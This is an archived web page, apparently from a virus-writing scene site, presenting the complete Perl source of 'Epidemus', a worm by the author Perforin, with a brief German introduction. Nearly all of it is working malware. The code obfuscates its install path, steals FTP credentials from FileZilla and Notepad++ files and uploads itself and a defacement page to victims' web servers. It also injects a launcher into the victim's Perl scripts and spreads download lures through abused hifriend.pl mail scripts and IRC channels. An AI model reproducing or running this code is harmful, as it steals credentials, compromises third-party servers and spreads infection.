<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>W32.Epidemus</title>
<link rel="stylesheet" href="../../../css/code.css" type=
"text/css" />
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Code</u>
<b>[+]</b><u>Von: Perforin</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Code</a></u>
</pre>
<hr />
<pre>
Epidemus - Webworm
 by Perforin

 Spreading Engines:
 -FTP
 -Mail (uses whitelist first, then google)
 -IRC
 
 
 Mein erster Wurm, den ich komplett in Perl gecoded habe.
 Auch wenn die Wahrscheinlichkeit nicht hoch ist, dass der Wurm
 sich auf vielen Maschinen verbreiten kann, rate ich trotzdem
 davon ab, meine Kreation freizusetzen!
 
 Ich hoffe ihr k&ouml;nnt was aus diesem Code lernen...
</pre>
<hr />
<pre>
#!/usr/bin/perl
=poc
 Epidemus - Webworm
 by Perforin

 Spreading Engines:
 -FTP
 -Mail (uses whitelist first, then google)
 -IRC
 
 
 Mein erster Wurm, den ich komplett in Perl gecoded habe.
 Auch wenn die Wahrscheinlichkeit nicht hoch ist, dass der Wurm
 sich auf vielen Maschinen verbreiten kann, rate ich trotzdem
 davon ab, meine Kreation freizusetzen!
 
 Ich hoffe ihr k&ouml;nnt was aus diesem Code lernen...
 
 
 Visit DarK-CodeZ.org / vx.perforin.de.vu
 
 ToDo: polymorher code,threads, ftp scannen

=cut

use Net::FTP;
use IO::Socket::INET;
use File::Basename;

($Programme,$Appdata) = ($ENV{'ProgramFiles'},$ENV{'Appdata'});
($virii,$xswyaq) = (basename($0),$ENV{'windir'});

mkdir("$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C')),0777);
$pathTOvirus = "$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C'))."$virii";

@whitelist = ("answers24x7.org","secretsinfuturestrading.com","bombaypeggys.com","stinkyandsmelly.com");
@rnames = ("staff","help","admin","support","webmaster","public","administrator","root");
@rdomains = ("wikipedia","yahoo","hotmail","gmail","thingeek","slashdot","zone-h","gulli");
@rtlds = ("com","net","de","lu","uk","us","cc","info","ch","fr","tv","fm","it","tk","mobi");

$payloadText =&lt;&lt;"TEXT";
A new life begins

Obliterate what makes us weak.
Decimate what threatens us.
Destroy Everything!
So a new life can begin.

Destroy Everything!
Rebuild and start again...
TEXT

$activate =&lt;&lt;"ACTIVE";
\$xswyaq = \$ENV{'windir'};
exec("\$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C'))."$virii");
ACTIVE

($size1,$size2,$size3) = (scalar(@rdomains),scalar(@rtlds),scalar(@rnames));
($rdomain1,$rdomain2) = (@rdomains[int(rand($size1))],@rtlds[int(rand($size2))]);
($rdomain3,$rname) = ("$rdomain1\.$rdomain2",@rnames[int(rand($size3))]);
($zero,$ten,$twenty) = (0,10,20);

$Epidemus = "Epidemus - Webworm v1.0";
$injection_counter = 0;

open(HTML,"&gt;","index.php");
print HTML &lt;&lt;"HTML";
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Chaos never ceases&lt;/title&gt;
&lt;/head&gt;
&lt;body bgcolor="black" style="color: red"&gt;
&lt;center&gt;
&lt;pre&gt;
&lt;b&gt;
$payloadText
&lt;/b&gt;
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;$Epidemus&lt;/h1&gt;
&lt;/center&gt;
HTML
close(HTML);

&amp;FileZilla;
&amp;notepadplusplus;
&amp;connect;
&amp;Mail;
&amp;Mirc;

rename($virii,$pathTOvirus);

sub FileZilla {
open(FileZilla,"&lt;","$Appdata\\FileZilla\\recentservers.xml") || &amp;notepadplusplus;
while (&lt;FileZilla&gt;) {
if ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/&lt;\/Host&gt;\n//;
$_ =~ s/^\s{11}//;
push(@PL_Hosts,"$_");
} elsif ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/&lt;\/Port&gt;\n//;
$_ =~ s/^\s{11}//;
push(@PL_Ports,"$_");
} elsif ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/&lt;\/User&gt;\n//;
$_ =~ s/^\s{11}//;
push(@PL_Users,"$_");
} elsif ($_ =~ m/\s\w?/) {
$_ =~ s/\s//;
$_ =~ s/&lt;\/Pass&gt;\n//;
$_ =~ s/^\s{11}//;
push(@PL_Passes,"$_");
}
}
close(FileZilla);
}

sub notepadplusplus {
open(NotePadPlusPlus,"&lt;","$Appdata\\Notepad++\\session.xml") || &amp;Mail;
while (&lt;NotePadPlusPlus&gt;) {
chomp($_);
if ($_ =~ m/\s$//;
if (! m/^\sxOffset=/) { push(@PL_Paths,"$_");}
}
}
close(NotePadPlusPlus);

open(NotePadPlusPlus,"&lt;","$Appdata\\Notepad++\\plugins\\config\\FTP_synchronizeA.ini") || &amp;Mail;
while (&lt;NotePadPlusPlus&gt;) {
chomp($_);
if ($_ =~ m/^Port=\d?/) {
$_ =~ s/^Port=//;
push(@PL_Ports,"$_");
} elsif ($_ =~ m/^Address=\w?/) {
$_ =~ s/^Address=//;
push(@PL_Hosts,"$_");
} elsif ($_ =~ m/^Username=\w?/) {
$_ =~ s/^Username=//;
push(@PL_Users,"$_");
} elsif ($_ =~ m/^Password=\w?/) {
$_ =~ s/^Password=//;
push(@PL_Passes,"$_");
}
}
close(NotePadPlusPlus);

foreach $Skript (@PL_Paths) {
if ($Skript =~ m/\.(pl|pm)$/i) {
open(Skript,"&lt;","$Skript");
@Skript_Inhalt = &lt;Skript&gt;;
close(Skript);

for (@Skript_Inhalt) {
if ($_ =~ m/^\s{0,10}$/) {
if ($injection_counter lt 1) {
$_ =~ s/^\s{0,10}$/$activate\n/;
$injection_counter++;
  }
 }
}

open(Skript,"&gt;","$Skript");
print Skript @Skript_Inhalt;
close(Skript);

} elsif ($Skript =~ m/\.(txt|log|ini)/) {
open(Skript,"&lt;","$Skript");
@Skript_Inhalt = &lt;Skript&gt;;
close(Skript);

for (@Skript_Inhalt) {
chomp($_);
if ($_ =~ m/\w+\@\w+\.\w+/) {
push(@PL_Mails,"$&amp;");
 }
}
 }
}

}

sub connect {
$size = scalar(@PL_Hosts);
for ($count = 0; $count &lt; $size; $count++) {
$ftp = Net::FTP-&gt;new("@PL_Hosts[$count]",
                     Port =&gt; @PL_Ports[$count],
                     Debug =&gt; 0,
                     Timeout =&gt; 3) || $count++;
$ftp-&gt;login("@PL_Users[$count]","@PL_Passes[$count]") || $count++;
@sh00p = $ftp-&gt;dir();
for $dir (@sh00p) {
if ($dir =~ m/httpdocs/) {
$ftp-&gt;cwd("/httpdocs");
} elsif ($dir =~ m/htdocs/) {
$ftp-&gt;cwd("/htdocs");
}
}
$ftp-&gt;type(A);
$ftp-&gt;put(basename($0));
$ftp-&gt;put("index.php");
$ftp-&gt;quit;
push(@succesfull,"@PL_Hosts[$count]");
}
}

sub Mail {
open(Pidgin,"&lt;","$Appdata\\.purple\\blist.xml") || exit;
while (&lt;Pidgin&gt;) {
if ($_ =~ m/\s&lt;name&gt;\w?/) {
$_ =~ s/\s&lt;name&gt;//;
$_ =~ s/&lt;\/name&gt;\n//;
$_ =~ s/^\s{1,4}//;
if ($_ =~ m/\w{1,15}\@\w{1,4}/) {
push(@PL_Mails,"$_");
  }
 }
}
close(Pidgin);
$count = 0;
&amp;sendmails;
} 

sub sendmails {
$whitelisted = scalar(@whitelist);
$suxxes = scalar(@succesfull);
$server = @succesfull[int(rand($suxxes))];
$mailText =&lt;&lt;"MAIL";
Hey!
Epidemus auf dem Weg um die Welt.
$server/Epidemus.pl  &lt;--- Gratis Download!

MAIL

if ($count gt $whitelisted) {
$count2 = 0;
$rnd = int(rand(3));
if ($rnd eq 0) {
$gPage = $zero;
} elsif ($rnd eq 1) {
$gPage = $ten;
} else {
$gPage = $twenty;
}
$qry = 'client=mozilla&amp;rls=de&amp;hs=duV&amp;q=inurl%3Ahifriend.pl+%2B+cgi-bin&amp;btnG=Suche&amp;lr=&amp;start='."$gPage".'&amp;sa=N';
$sock = new IO::Socket::INET(PeerAddr =&gt; "www.google.com",
                                PeerPort =&gt; 80,
                                Proto =&gt; 'tcp',
                                Timeout =&gt; 2) || exit;

print $sock "GET /search?$qry HTTP/1.1\r\n";
print $sock "Host: $addy\r\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\r\n";
print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
print $sock "Connection: close\n";
print $sock "\r\n\r\n";

open(TMP,"&gt;","t3mp.tmp");
while(&lt;$sock&gt;) {
if (m/\&lt;div id=ssb\&gt;/) {
if (m/\w?hifriend\w?/) {
$_ =~ s/"/\n/ig;
print TMP $_;
}
}
}
close(TMP);

open(TMP,"&lt;","t3mp.tmp");
while (&lt;TMP&gt;) {
chomp($_);
if (m/^http:\/\// &amp;&amp; m/cgi-bin/) {
if(! m/google/ &amp;&amp; ! m/search?/) {
if(m/w?\.?\w+\.\w+\.\w+\.?\w+/) {
push(@gHosts,$&amp;);
    }
if (m/\/cgi-bin\/\w+\/hifriend.pl$/) {
push(@gPaths,$&amp;);
   }
  }
 }
}
close(TMP);
unlink("t3mp.tmp");
foreach (@gPaths) { $_ =~ s/hifriend.pl$//; }

$sock = new IO::Socket::INET(PeerAddr =&gt; @gHosts[$count2],
                                PeerPort =&gt; 80,
                                Proto =&gt; 'tcp',
                                Timeout =&gt; 2) || $count2++ &amp;&amp; (&amp;sendmails);
                                
%mailconfig = (
Path =&gt; @gPaths[$count2],
From =&gt; "$rname".chr(64)."$rdomain3",
Name =&gt; "Your $rdomain3 support!",
MSG =&gt; "$mailText"
);

} else {
$sock = new IO::Socket::INET(PeerAddr =&gt; @whitelist[$count],
                                PeerPort =&gt; 80,
                                Proto =&gt; 'tcp',
                                Timeout =&gt; 2) || $count++ &amp;&amp; (&amp;sendmails);

%mailconfig = (
Path =&gt; "/cgi-bin/",
From =&gt; "$rname".chr(64)."$rdomain3",
Name =&gt; "Your $rdomain3 support!",
MSG =&gt; "$mailText"
);

}

foreach $mail (@PL_Mails) {
$data = 'refpage=&amp;reftitle=&amp;Friends='.$mail.'&amp;SenderName='.$mailconfig{'Name'}.'&amp;From='.$mailconfig{'From'}.'&amp;PersonalMsg='.$mailconfig{'MSG'};
$lngt = length($data);
print $sock "POST $mailconfig{'Path'}hifriend.pl?sp=y HTTP/1.1\n";
print $sock "Host: $mailconfig{'Server'}\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\n";
print $sock "Accept-Encoding: gzip,deflate\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
print $sock "Keep-Alive: 300\n";
print $sock "Connection: keep-alive\n";
print $sock "Referer: $mailconfig{'Server'}/cgi-bin/hifriend.pl\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lngt\n\n";
print $sock "$data\n";
}

}

sub Mirc {
open(MirC,"&lt;","$Appdata\\NoNameScript\\mirc.ini") || open(MirC,"&lt;","$Programme\\mIRC\\mirc.ini") || last;
while (&lt;MirC&gt;) {
chomp($_);
if ($_ =~ m/^host=/) {
$_ =~ s/^host=//;
$_ =~ s/:/\n/ig;
open(EpMi,"&gt;","mirz.txt"); { print EpMi $_; }
close(EpMi);
}
}
close(MirC);
open(EpMi,"&lt;","mirz.txt");
@CNFG = &lt;EpMi&gt;;
close(EpMi);

unlink("mirz.txt");

($SRVR,$CHN) = (@CNFG[1],@CNFG[3]);
($NIKK,$M4IL) = ("Epidemus","lol 8 * :lowl.de");

chomp($SRVR);
$spredVIAmirc = new IO::Socket::INET(
                                PeerAddr =&gt; $SRVR,
                                PeerPort =&gt; 6667,
                                Proto =&gt; 'tcp',
                               ) || last;

print $spredVIAmirc "NICK $NIKK\r\n";
print $spredVIAmirc "USER $M4IL\r\n";
print $spredVIAmirc "JOIN $CHN\r\n";

while ($output = &lt;$spredVIAmirc&gt;) {
if ($output =~ m/^PING (.*?)$/gi) {
print $spredVIAmirc "PONG ".$1."\n";
} elsif ($output =~ m/Hallo/i) {
(print $spredVIAmirc "PRIVMSG $CHN :Hey voll geil, hier auf $server/$virii gibt es Epidemus zum saugen :D\r\n");
last;
}
}
}
</pre>
</body>
</html>
